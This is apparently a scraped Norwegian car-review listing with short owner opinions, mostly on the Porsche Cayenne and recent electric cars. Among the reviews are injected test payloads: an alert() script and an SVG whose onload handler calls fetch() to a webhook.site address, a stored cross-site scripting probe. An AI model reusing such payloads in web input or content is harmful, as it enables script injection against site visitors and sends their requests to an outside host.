Porsche Cayenne (2008)
Dette er en SUV for den kresne! råsterk motor som ikke behøver turtall for noe som helst, vi kunne fint marsjet over fjellet med full bil under 2500 Omdreininger. halv gass holder til forbikjøringe
Porsche Cayenne (2006)
Porsche er Porsche, vil du kjøre det beste kjøper man Porsche.
Porsche Cayenne (2006)
Meget spesiell og kjekk bil med en råsterkt og stillegående motor.
Porsche Cayenne (2005)
Fantastisk byggekvalitet. Ikke en - 1 - feil, kjørt snart 60 tusen. En innkalling til importør, skulle skifte en bolt på en pedal. Utrolig deilig å sette seg inn i. Kan fint kjøres på 0,7 om
Porsche Cayenne (2005)
Luftfjæring er et "must". (noen skriver negativt om det, men det er bare sprøyt) I tillegg har min utgave "hydrauliske krengningsstabilisatorer" noe som gjør at hvert av hjulene er helt uavhengig a
Porsche Cayenne (2005)
Fantastisk bil med en helt nydelig kjørekomfort. Kostbar å sette på verksted, og noe dyr i drift. Lite problemer. Hadde bilen fra den var 1 år fammel og i ti år. Savner den fortsatt.
Porsche Cayenne (2005)
Veldig god bil og gjennomgående god følelse av kvalitet , men kan fort koste litt ekstra hvis det sjer noe
Porsche Cayenne (2004)
Alle burde hatt en Porsche Cayenne opplevelse. En referansebil for kvalitet og kjøreglede.
Porsche Cayenne (2004)
STYR unna
Porsche Cayenne (2003)
Er man ikke redd for å skille seg ut og satt i bås som en voldtektsmann av miljøet så er dette noe av det morsomste man kan kjøpe for under 200K
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km